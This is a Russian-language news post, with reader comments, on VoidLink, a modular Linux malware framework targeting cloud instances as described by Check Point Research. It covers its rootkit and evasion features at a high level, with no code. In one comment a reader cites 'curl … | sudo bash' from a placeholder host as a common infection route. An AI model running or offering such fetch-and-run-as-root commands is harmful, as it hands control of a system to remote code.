VoidLink — вредонос, нацеленный на облачные инстансы Linux

VoidLink — новое вредоносное ПО для Linux — вызывает серьёзную обеспокоенность из-за своей скрытности и высокой степени кастомизации.

Вредоносное ПО для Linux не всегда находится в центре внимания администраторов. Однако был обнаружен новый фреймворк под названием VoidLink, который значительно превосходит по уровню сложности типичный вредоносный код.

VoidLink представляет собой фреймворк с более чем 30 модулями, которые можно добавлять или удалять, настраивая его возможности под конкретные цели и задачи атакующего. Среди модулей есть средства для обеспечения скрытности, разведки, повышения привилегий и перемещения внутри сети. По мере развития вредоносной кампании само ПО также может эволюционировать благодаря модульной архитектуре.

Основной фокус VoidLink — установки Linux на облачных хостингах, таких как AWS и Google Cloud, и этот список продолжает расширяться. Сразу после заражения VoidLink сканирует систему, определяет облачного провайдера через API метаданных инстанса. Цель — скрытный долгосрочный доступ, слежка и сбор данных.

VoidLink был обнаружен исследовательским подразделением Check Point Research, которое подробно описало принципы его работы. Согласно отчёту:

«Набор возможностей VoidLink необычайно широк. Он включает функции уровня руткита (LD_PRELOAD, LKM и eBPF), систему плагинов, работающую в памяти, для расширения функциональности, а также адаптивную скрытность, которая динамически подстраивает методы обхода защиты в зависимости от обнаруженных средств безопасности, отдавая приоритет операционной скрытности, а не производительности в контролируемых средах».

В Check Point Research также отметили, что VoidLink, по всей видимости, был создан и поддерживается разработчиками, связанными с Китаем.

@j_larkin
19.01.2026 14:24 UTC
Первоисточник

Комментарии

@Bifid
19.01.2026 09:25 UTC
+1

А как происходит заражение ? Как вредонос попадает на хост ?

@j_larkin
19.01.2026 09:29 UTC
+3

Отчёт сосредоточен на post-exploitation, однако механизм первоначальной доставки бинарного файла не раскрыт. Упоминается только наличие многоступенчатой цепочки заражения.

@vm03
19.01.2026 10:57 UTC
0

Сейчас так модно:

curl verylonglink.xxx | sudo bash

@kmeaw
19.01.2026 09:51 UTC
0

А как именно используется eBPF?

@j_larkin
19.01.2026 09:57 UTC
0

Согласно отчету, в VoidLink eBPF применяется как один из трёх вариантов руткит-технологий на уровне ядра для обеспечения максимальной скрытности. Это не основной, а условный механизм, который выбирается автоматически в зависимости от версии ядра и возможностей системы.

Условия выбора и развертывания eBPF (прямая цитата из отчёта):

«eBPF: For a Kernel version ≥ 5.5 with eBPF support»

«It couples them with eBPF programs that can hook sensitive paths without requiring a traditional LKM on newer, locked-down systems.»

«VoidLink handles rootkit deployment once again, based on the environment in which it runs, and chooses the right rootkit to deploy accordingly.»